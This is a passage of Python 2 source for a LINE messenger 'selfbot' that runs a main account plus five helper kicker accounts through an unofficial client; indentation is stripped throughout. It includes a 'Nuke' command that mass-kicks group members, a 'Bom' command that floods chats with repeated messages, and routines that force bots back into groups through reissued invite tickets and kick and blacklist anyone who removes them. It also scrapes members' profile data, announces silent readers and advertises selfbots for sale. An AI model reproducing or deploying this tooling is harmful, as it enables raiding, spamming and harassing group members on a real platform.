except:
acil.sendText(msg.to,"Could not find it")
elif "Youtubesearch " in msg.text:
query = msg.text.replace("Youtubesearch ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
hasil = ""
for a in soup.select('.yt-lockup-title > a[title]'):
if '&list=' not in a['href']:
hasil += ''.join((a['title'],'\nUrl : http://www.youtube.com' + a['href'],'\n\n'))
acil.sendText(msg.to,hasil)
print '[Command] Youtube Search'
#------------------------------------------------
elif "Getinfo" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = acil.getContact(key1)
cu = acil.channel.getCover(key1)
try:
acil.sendText(msg.to,"~Nama\n" + contact.displayName + "\n~Mid\n" + contact.mid + "\n~Bio\n" + contact.statusMessage + "\n~Profile Picture\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n~Header\n" + str(cu))
except:
acil.sendText(msg.to,"~Nama\n" + contact.displayName + "\n~Mid\n" + contact.mid + "\n~Bio\n" + contact.statusMessage + "\n~Profile Picture\n" + str(cu))
elif "Getbio" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = acil.getContact(key1)
cu = acil.channel.getCover(key1)
try:
acil.sendText(msg.to,contact.statusMessage)
except:
acil.sendText(msg.to,contact.statusMessage)
elif "Gimage" in msg.text:
group = acil.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
acil.sendImageWithURL(msg.to,path)
elif "Getprofile @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Getprofile @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = acil.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
acil.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
#------------------------------------------------------------
elif msg.text in ["Invite"]:
wait["invite"] = True
random.choice(KAC).sendText(msg.to,"send contact 😉")
#------------------------------------------------------------
elif "Getcover @" in msg.text:
print "[Command]cover executing"
_name = msg.text.replace("Getcover @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = acil.getContact(target)
cu = acil.channel.getCover(target)
path = str(cu)
acil.sendImageWithURL(msg.to, path)
except Exception as e:
raise e
print "[Command]cover executed"
elif msg.text.lower() == 'reboot':
print "[Command]Like executed"
try:
acil.sendText(msg.to,"Restarting...")
restart_program()
except:
acil.sendText(msg.to,"Please wait")
restart_program()
pass
elif "Hay " in msg.text:
say = msg.text.replace("Hay ","")
lang = 'id'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
acil.sendAudio(msg.to,"hasil.mp3")
elif "Nuke" in msg.text:
if msg.toType == 2:
print "Nuke ok"
_name = msg.text.replace("Nuke","")
gs = ki5.getGroup(msg.to)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Limit gw njir..")
else:
for target in targets:
if not target in Bots:
if not target in PRANKBOT + wait["ACIL"]:
try:
klist=[ki,ki2,ki3,ki4,ki5]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[target])
except:
pass
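# "Tag"/"Tagall": mention every member. Members are chunked 500 per message, presumably to stay under LINE's per-message mention limit; each "@Krampus" placeholder spans 8 characters plus a newline, hence the S/E offsets and the s += 9 step.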
elif msg.text in ["Tag","Tagall","Mencret"]:
group = acil.getGroup(msg.to)
k = len(group.members)//500
for j in xrange(k+1):
msg = Message(to=msg.to)
txt = u''
s=0
d=[]
for i in group.members[j*500 : (j+1)*500]:
d.append({"S":str(s), "E" :str(s+8), "M":i.mid})
s += 9
txt += u'@Krampus\n'
msg.text = txt
msg.contentMetadata = {u'MENTION':json.dumps({"MENTIONEES":d})}
acil.sendMessage(msg)
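# ".": temporarily disable the join-by-ticket lock, reissue the group QR ticket, pull every helper bot in with it, then relock the group.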
elif msg.text.lower() == '.':
G = acil.getGroup(msg.to)
ginfo = acil.getGroup(msg.to)
G.preventJoinByTicket = False
acil.updateGroup(G)
invsend = 0
Ticket = acil.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = acil.getGroup(msg.to)
ginfo = acil.getGroup(msg.to)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
print "kicker ok"
#-----------------------------------------------
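# "reinvite": make all helper bots leave the group and rejoin via a freshly reissued ticket.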
elif msg.text.lower() == 'reinvite':
if msg.toType == 2:
G = acil.getGroup(msg.to)
ginfo = acil.getGroup(msg.to)
acil.sendText(msg.to,"waitting...")
ki.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
ki3.leaveGroup(msg.to)
ki4.leaveGroup(msg.to)
ki5.leaveGroup(msg.to)
G.preventJoinByTicket = False
acil.updateGroup(G)
invsend = 0
Ticket = acil.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
G = acil.getGroup(msg.to)
ginfo = acil.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
#-----------------------------------------------
elif "B1 in" in msg.text:
G = acil.getGroup(msg.to)
ginfo = acil.getGroup(msg.to)
G.preventJoinByTicket = False
acil.updateGroup(G)
invsend = 0
Ticket = acil.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
G = acil.getGroup(msg.to)
ginfo = acil.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
#-----------------------------------------------
elif "B2 in" in msg.text:
G = acil.getGroup(msg.to)
ginfo = acil.getGroup(msg.to)
G.preventJoinByTicket = False
acil.updateGroup(G)
invsend = 0
Ticket = acil.reissueGroupTicket(msg.to)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
G = acil.getGroup(msg.to)
ginfo = acil.getGroup(msg.to)
G.preventJoinByTicket = True
ki2.updateGroup(G)
print "kicker ok"
#-----------------------------------------------
elif "B3 in" in msg.text:
G = acil.getGroup(msg.to)
ginfo = acil.getGroup(msg.to)
G.preventJoinByTicket = False
acil.updateGroup(G)
invsend = 0
Ticket = acil.reissueGroupTicket(msg.to)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
G = acil.getGroup(msg.to)
ginfo = acil.getGroup(msg.to)
G.preventJoinByTicket = True
ki3.updateGroup(G)
print "kicker ok"
#-----------------------------------------------
elif "B4 in" in msg.text:
G = acil.getGroup(msg.to)
ginfo = acil.getGroup(msg.to)
G.preventJoinByTicket = False
acil.updateGroup(G)
invsend = 0
Ticket = acil.reissueGroupTicket(msg.to)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
G = acil.getGroup(msg.to)
ginfo = acil.getGroup(msg.to)
G.preventJoinByTicket = True
ki4.updateGroup(G)
print "kicker ok"
#-----------------------------------------------
elif "B5 in" in msg.text:
G = acil.getGroup(msg.to)
ginfo = acil.getGroup(msg.to)
G.preventJoinByTicket = False
acil.updateGroup(G)
invsend = 0
Ticket = acil.reissueGroupTicket(msg.to)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
G = acil.getGroup(msg.to)
ginfo = acil.getGroup(msg.to)
G.preventJoinByTicket = True
ki5.updateGroup(G)
print "kicker ok"
elif msg.text.lower() == ',':
if msg.toType == 2:
ginfo = acil.getGroup(msg.to)
try:
ki.sendText(msg.to,"Bye Bye😘 " + str(ginfo.name) + "")
ki.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
ki3.leaveGroup(msg.to)
ki4.leaveGroup(msg.to)
ki5.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "Bye" in msg.text:
if msg.toType == 2:
ginfo = acil.getGroup(msg.to)
try:
acil.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B1 bye" in msg.text:
if msg.toType == 2:
ginfo = acil.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B2 bye" in msg.text:
if msg.toType == 2:
ginfo = acil.getGroup(msg.to)
try:
ki2.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B3 bye" in msg.text:
if msg.toType == 2:
ginfo = acil.getGroup(msg.to)
try:
ki3.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B4 bye" in msg.text:
if msg.toType == 2:
ginfo = acil.getGroup(msg.to)
try:
ki4.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B5 bye" in msg.text:
if msg.toType == 2:
ginfo = acil.getGroup(msg.to)
try:
ki5.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Welcome","wc","welcome","Wc"]:
ginfo = acil.getGroup(msg.to)
acil.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
acil.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
elif "Bc " in msg.text:
bctxt = msg.text.replace("Bc ","")
ki.sendText(msg.to,(bctxt))
elif "Say " in msg.text:
bctxt = msg.text.replace("Say ","")
ki.sendText(msg.to,(bctxt))
ki2.sendText(msg.to,(bctxt))
ki3.sendText(msg.to,(bctxt))
ki4.sendText(msg.to,(bctxt))
ki5.sendText(msg.to,(bctxt))
elif "Bom " in msg.text:
bctxt = msg.text.replace("Bom ","")
ki.sendText(msg.to,(bctxt))
ki2.sendText(msg.to,(bctxt))
ki3.sendText(msg.to,(bctxt))
ki4.sendText(msg.to,(bctxt))
ki5.sendText(msg.to,(bctxt))
ki.sendText(msg.to,(bctxt))
ki2.sendText(msg.to,(bctxt))
ki3.sendText(msg.to,(bctxt))
ki4.sendText(msg.to,(bctxt))
ki5.sendText(msg.to,(bctxt))
ki.sendText(msg.to,(bctxt))
ki2.sendText(msg.to,(bctxt))
ki3.sendText(msg.to,(bctxt))
ki4.sendText(msg.to,(bctxt))
ki5.sendText(msg.to,(bctxt))
elif msg.text.lower() == 'ping':
ki.sendText(msg.to,"Ping ")
ki2.sendText(msg.to,"Ping ")
ki3.sendText(msg.to,"Ping ")
ki4.sendText(msg.to,"Ping ")
ki5.sendText(msg.to,"Ping ")
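# op.type 19 = member kicked. If one of the bots was kicked, a surviving bot kicks the offender, reopens the ticket, re-invites the whole bot squad, relocks the group and blacklists the kicker.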
if op.type == 19:
try:
if op.param3 in mid:
if op.param2 in kimid:
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
acil.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
acil.updateGroup(G)
else:
G = ki.getGroup(op.param1)
ki.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
acil.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
acil.updateGroup(G)
ki.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in kimid:
if op.param2 in ki2mid:
G = ki2.getGroup(op.param1)
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
acil.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
else:
G = ki2.getGroup(op.param1)
ki2.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
acil.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
acil.updateGroup(G)
ki2.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki3mid:
if op.param2 in ki2mid:
G = ki2.getGroup(op.param1)
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
acil.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
else:
G = ki2.getGroup(op.param1)
ki2.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
acil.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
acil.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki2mid:
if op.param2 in ki3mid:
G = ki3.getGroup(op.param1)
G.preventJoinByTicket = False
ki3.updateGroup(G)
Ticket = ki3.reissueGroupTicket(op.param1)
acil.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki3.updateGroup(G)
else:
G = ki3.getGroup(op.param1)
ki3.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki3.updateGroup(G)
Ticket = ki3.reissueGroupTicket(op.param1)
acil.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki3.updateGroup(G)
acil.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki4mid:
if op.param2 in ki5mid:
G = ki5.getGroup(op.param1)
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
acil.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
acil.updateGroup(G)
else:
G = ki5.getGroup(op.param1)
ki5.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
acil.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
acil.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki5mid:
if op.param2 in ki4mid:
G = ki4.getGroup(op.param1)
G.preventJoinByTicket = False
ki4.updateGroup(G)
Ticket = ki4.reissueGroupTicket(op.param1)
acil.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki4.updateGroup(G)
else:
G = ki4.getGroup(op.param1)
ki4.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki4.updateGroup(G)
Ticket = ki4.reissueGroupTicket(op.param1)
acil.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki4.updateGroup(G)
acil.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki3mid:
if op.param2 in mid:
G = acil.getGroup(op.param1)
G.preventJoinByTicket = False
acil.updateGroup(G)
Ticket = acil.reissueGroupTicket(op.param1)
acil.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
acil.updateGroup(G)
else:
G = acil.getGroup(op.param1)
acil.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
acil.updateGroup(G)
Ticket = acil.reissueGroupTicket(op.param1)
acil.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
acil.updateGroup(G)
wait["blacklist"][op.param2] = True
except:
pass
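# op.type 17 = member joined. With protect on, blacklisted joiners are kicked on sight; other non-bot joiners get a warning message.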
if op.type == 17:
if op.param2 not in Bots:
if op.param2 not in PRANKBOT:
if op.param2 in Bots:
pass
if wait["protect"] == True:
if wait["blacklist"][op.param2] == True:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
ki5.updateGroup(G)
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
pass
elif op.param2 not in Bots:
if op.param2 not in PRANKBOT:
random.choice(KAC).sendText(op.param1,"Welcome. Don't Play Bots. I can kick you!")
if op.type == 19:
if op.param2 not in Bots:
if op.param2 not in PRANKBOT:
if op.param2 in Bots:
pass
elif wait["protect"] == True:
wait ["blacklist"][op.param2] = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
acil.sendText(op.param1,"")
else:
acil.sendText(op.param1,"")
if op.type == 13:
if op.param2 not in Bots:
if op.param2 not in PRANKBOT:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
acil.sendText(op.param1,"")
else:
acil.sendText(op.param1,"")
if op.param2 not in Bots:
if op.param2 not in PRANKBOT:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
acil.cancelGroupInvitation(op.param1,[contact.mid for contact in acil.getGroup(op.param1).invitee])
else:
acil.sendText(op.param1,"")
else:
acil.sendText(op.param1,"")
if op.param2 not in Bots:
if op.param2 not in PRANKBOT:
if op.param2 in Bots:
pass
elif wait["cancelprotect"] == True:
wait ["blacklist"][op.param2] = True
acil.cancelGroupInvitation(op.param1,[contact.mid for contact in acil.getGroup(op.param1).invitee])
else:
acil.sendText(op.param1,"JANGAN INVITE TANPA SEIJIN ADMIN.!")
else:
acil.sendText(op.param1,"")
if op.type == 11:
if op.param2 not in Bots:
if op.param2 not in PRANKBOT:
if op.param2 in Bots:
pass
elif wait["linkprotect"] == True:
wait ["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = True
ki.updateGroup(G)
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
acil.sendText(op.param1,"")
else:
acil.sendText(op.param1,"")
if op.type == 5:
if wait["autoAdd"] == True:
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':'u5818cb4404411c2e2e6e6937d172cca8'}
acil.sendImageWithURL(op.param1,"|======AUTO ADD======|\n\nSUBCRABE MY CHANNEL YOUTUBE\n\nhttps://www.youtube.com/channel/UCycBrqSWEHdk-slnhUmGWiQ\n\nMENERIMA PESANAN SELFBOT MINAT.!!\nINFO LANGSUNG KE\n\nID:::::http://line.me/ti/p/~adiputra.95")
if (wait["message"] in [""," ","\n",None]):
pass
else:
acil.sendText(op.param1,str(wait["message"]))
acil.sendMessage(c)
ki.sendText(op.param1,str(wait["message"]))
ki.sendMessage(c)
ki2.sendText(op.param1,str(wait["message"]))
ki2.sendMessage(c)
ki3.sendText(op.param1,str(wait["message"]))
ki3.sendMessage(c)
ki4.sendText(op.param1,str(wait["message"]))
ki4.sendMessage(c)
ki5.sendText(op.param1,str(wait["message"]))
ki5.sendMessage(c)
#------Open QR Kick start------#
if op.type == 11:
if wait["linkprotect"] == True:
if op.param2 not in Bots:
if op.param2 not in PRANKBOT:
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param3])
random.choice(KAC).updateGroup(G)
#------Open Kick finish-----#
#------invite Kick start------#
if op.type == 13:
if wait["inviteprotect"] == True:
if op.param2 not in Bots:
if op.param2 not in PRANKBOT:
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param3])
random.choice(KAC).updateGroup(G)
#------invite Kick finish-----#
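# op.type 55 = message-read event, used here as a "sider" (silent reader) detector: first-time readers are announced with their first name and avatar.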
if op.type == 55:
try:
if cctv['cyduk'][op.param1]==True:
if op.param1 in cctv['point']:
Name = acil.getContact(op.param2).displayName
Np = acil.getContact(op.param2).pictureStatus
if Name in cctv['sidermem'][op.param1]:
pass
else:
cctv['sidermem'][op.param1] += "\n• " + Name
if " " in Name:
nick = Name.split(' ')
if len(nick) == 2:
acil.sendText(op.param1,"═════════SIDER═════════\n" + nick[0] + "\n" + wait["sider1"])
acil.sendImageWithURL(op.param1, "http://dl.profile.line-cdn.net/" + Np)
else:
acil.sendText(op.param1,"═════════SIDER═════════\n" + nick[0] + "\n" + wait["sider1"])
acil.sendImageWithURL(op.param1, "http://dl.profile.line-cdn.net/" + Np)
else:
acil.sendText(op.param1,"═════════SIDER═════════\n" + nick[0] + "\n" + wait["sider1"])
acil.sendImageWithURL(op.param1, "http://dl.profile.line-cdn.net/" + Np)
else:
pass
else:
pass
except:
pass
else:
pass
if op.type == 55:
if op.param1 in wait2['readPoint']:
Name = acil.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name
wait2['ROM'][op.param1][op.param2] = "・" + Name
else:
pass
if op.type == 17:
if wait["wcOn"] == True:
ginfo = acil.getGroup(op.param1)
contact = acil.getContact(op.param2)
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
acil.sendText(op.param1,wait["joingc"] + "\n" + acil.getContact(op.param2).displayName + "\nDi grup " + str(ginfo.name) + "\nPembuat grup " + ginfo.creator.displayName + "\n\n══════WE ARE FROM PRANKBOTS═══════")
acil.sendMessage(c)
acil.sendImageWithURL(op.param1,"http://dl.profile.line-cdn.net/" + contact.pictureStatus)
print ("MEMBER JOIN TO GROUP")
if op.type == 15:
if wait["leftOn"] == True:
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
acil.sendMessage(c)
acil.sendText(op.param1,acil.getContact(op.param2).displayName + "\n" + wait["leftgc"])
print ("MEMBER HAS LEFT THE GROUP")
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
if op.param2 in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += op.param2
wait2['ROM'][op.param1][op.param2] = op.param2
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
else:
pass
except:
pass
if op.type == 59:
print op
except Exception as error:
print error
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT in ["10","20","30","40","50","00"]:
return False
else:
return True
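# Background worker: when wait["clock"] is on, keep re-writing the account's display name as wait["cName"] plus the current (HH:MM) time, looping roughly every 0.3 s.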
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = acil.getProfile()
profile.displayName = wait["cName"] + nowT
acil.updateProfile(profile)
time.sleep(0.30)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
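# Main long-poll loop: fetch up to 5 pending operations, advance the stored revision past each one, and hand every op to bot().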
while True:
try:
Ops = acil.fetchOps(acil.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(acil.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
acil.Poll.rev = max(acil.Poll.rev, Op.revision)
bot(Op)